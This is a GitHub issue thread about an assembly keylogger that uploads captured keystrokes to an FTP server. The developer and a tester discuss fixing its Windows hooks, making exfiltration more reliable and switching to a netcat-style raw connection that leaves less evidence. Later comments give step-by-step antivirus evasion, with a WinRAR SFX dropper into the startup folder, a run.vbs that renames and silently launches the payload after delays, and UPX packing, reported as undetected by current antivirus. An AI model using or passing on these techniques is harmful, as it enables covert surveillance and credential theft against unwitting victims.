### ISSUE TITLE
Update & Fixes

### ISSUE THREAD

**Issue by mtebbens** [andrewcanafe/Mini-FTP-Keylogger#1]

**Comment by andrewcanafe** [comment]
Hi, and thank you for your taking the time out of your day to test my code. You are correct. The program crashes when it is unable to access the FTP server and global hooks do not work with the latest Windows updates.

In the scenario where the program is unable to access the FTP server, my original intent was to have the program continue logging keystrokes. The program would attempt to flush the logfile to the server, *but only on user login*. If it cannot connect, then it will simply continue to append keystrokes (and other info) to the end of the existing logfile. Almost everything happens at user login, including modifying the Windows registry, assigning a unique directory ID to the client, and etc.

I have fixed the global hooks. Apparently I wasn't allocating enough shadow space prior to calling CallNextHookEx. The latest Windows updates punished me for this, as the program would crash after the first recorded keystroke. You can see the changes I made to fix this in the last several lines of code in miniftpkeylogger.asm.

I will think about adding the option to "FTP only when the log reaches a specific size." Your idea definitely makes sense. However, this is additional code work on a project I haven't touched in years. The program already attempts to send the logfile via FTP upon each user login, so I would like to hear the reasoning behind this first.

Anyway, feel free to comment back if you find that the changes I made do not work. I have tested it on my machine using a remote FTP server (000webhost).

**Comment by mtebbens** [comment]
This is great, happy to see your working on this, thank you!

I wrote one of the first keyloggers myself (in assembly of course) a very very long time ago, google "keytrap dcypher". I wanted to keep it small, clean and very effective. Just do one thing, and do it really good, which is exactly what I see in your code!

I'll play with it for a while and get back to you.

**Comment by andrewcanafe** [comment]
Awesome stuff, and thanks for the article!

**Comment by mtebbens** [comment]
Working....Hurray !

Some fixes/suggestions....

On the ftp server if the working directory is missing the logger will no longer flush the log file to the server (in case ftp root is cleaned, the logger would no longer write anything). At least that's what I'm seeing right now.

I would suggest that the logger always make the dir on the ftp server (if it doesn't delete all the files in it), then Put the log file. In fact ... if ANY connection/transfer problems come up (like no internet, can't connect, can't mkdir, can't put...etc), just set a 'TRY_AGAIN' flag, which would work with my suggestion below. I also noticed the connection to the ftp server looks like it stays open.... why not just try to ftp the log file, then close connection.

I see what you mean by "Almost everything happens at user login". It looks like the log file is sent (or tries) only once on boot/login like you said, but for systems that rarely get turned on/off or restarted, nothing could be sent for days, weeks or months.... I know many people who don't restart their desktop unless they really have to, especially work systems. Also, what if the system is not set to automatically connect to the LAN or Internet... on boot/login, the logger would try and fail to send the log file before the user connects via wifi or ethernet.

I would suggest adding and/or changing to Timer and Log Size variables.

Don't force send the log file on start, instead start a timer.... every WAIT_TO_SEND minutes, check the log file size against SIZE_TO_SEND, if equal or greater set the TRY_TO_SEND flag. Then, if any connection/ftp problems come up, keep TRY_TO_SEND Flag set and restart the timer. This way someone could set maybe 60 minutes and 4000 bytes. If nothing was logged, nothing gets sent. If something was logged, log file gets sent..... no waiting for a boot/restart/login.

**Comment by andrewcanafe** [comment]
Thank you for providing your constructive criticism.

Always attempting to create the unique directory makes sense. Fixed.

Closing the FTP connection makes sense. Fixed.

Timers and log size variables makes sense, as I myself tend to leave my computer on for months without restarting. But I'm a little busy right now. Maybe I'll add it to the main code sometime in the future. Or if I ever create another keylogger from scratch.

I've also updated the README instructions for removing the unique directory ID via Windows registry.

**Comment by mtebbens** [comment]
Been playing with it for the past few days.... creating and testing ideas.

It definitely has me re-learning asm and how anti-virus software works, thanks!
It also seems very stable... there is nothing I can do to make it crash.

Its pretty FUD when manually scanned, although as soon as you run it..... copying itself to a hidden AppData folder, then adding itself to the Registry definitely sets off AV red flags!  So, after pulling out that code and using winrar sfx instead, to unpack and run, its FUD with all the AV software I've tested it with.

I didn't see any functions under wininet, but is there a way to open a raw connection to a specific port and just send keys ... similar to netcat?  That way you can eliminate evidence such as the log file, username and password. At the other end, there is also no need to setup an FTP server, just have netcat listening.

**Comment by andrewcanafe** [comment]
Very interesting! It's been quite a while since I last used WinRAR SFX. Do you mind sharing the steps you took to make it FUD?

To choose a specific port to connect to, we don't use WinInet. WinInet is a high-level API that only provides functions that connect through the popular protocols such as FTP, HTTP, HTTPS, and SOCKS. We use the lower-level Winsock API to make connections to custom ports. And old programmer by the name of Iczelion had some good tutorials on almost everything regarding Win32 assembly, including Winsock. However, his website is no longer up and running. [Here's an archive link instead.](http://web.archive.org/web/20190104104924/http://win32assembly.programminghorizon.com/asmsockguide.html) Should work with netcat.

**Comment by mtebbens** [comment]
1. Remove any code that creates and hides the appdata dir, and any code that copies itself over to that dir. (wording it like that should keep most script-kiddies away). For my use, I also pulled all the ftp code, leaving just the registry, log file code and hook. This leaves the AV with very little code and actions to analyze and preform their "Duck Test".

2. Grab WinRAR and SFX with 2 files and the following options:
File1: executable
File2: run.vbs

run.vbs contains almost anything you want, but must include:
Set File1 = CreateObject("WScript.Shell")
File1.Run ("executable.exe")

Under the Comment tab use the following:
Path="%APPDATA%\Startup"
Setup=run.vbs
Overwrite=1
Silent=1
Update=U

Now your all set... very FUD and very little for the AV to scan, observe and analyze!
You may have to tinker with the code to get better FUD (compile, scan, change code, compile, scan....etc).
After doing this for a week now, I've noticed that suspicious code is uploaded to an AV server then further analyzed (I'm guessing its run in some type of VM to see exactly what it does).

**Comment by mtebbens** [comment]
This seems to work better, especially when the AV is up-to-date with a working internet connection (so it can upload and analyze suspicious stuff)

FUD on the latest Kasperkey AV with Internet on, even on reboot.

1. upx --ultra-brute executable (or maybe obfuscate/encrypt the exe, decrypt on execute)

1. Rename the exectuable to a .txt extention (or anything you want).

change run.vbs:
; Sleep
WScript.Sleep 60000
; Change File Name
Set FSO = CreateObject("Scripting.FileSystemObject")
SourceFile = "executable.txt"
DestinationFile = "executable.exe"
FSO.MoveFile SourceFile, DestinationFile
; Sleep
WScript.Sleep 60000
; Execute
Set File1 = CreateObject("WScript.Shell")
File1.Run ("executable.exe")

Playing around with the code and/or settings might get you better, longer lasting FUD.
As long as its not very suspicious, then it won't get uploaded to an AV server and fully analyzed.

Now I'm curious how long it will remain FUD!

Dcypher #3064 (on discord)

**Comment by andrewcanafe** [comment]
Firekaz#0390
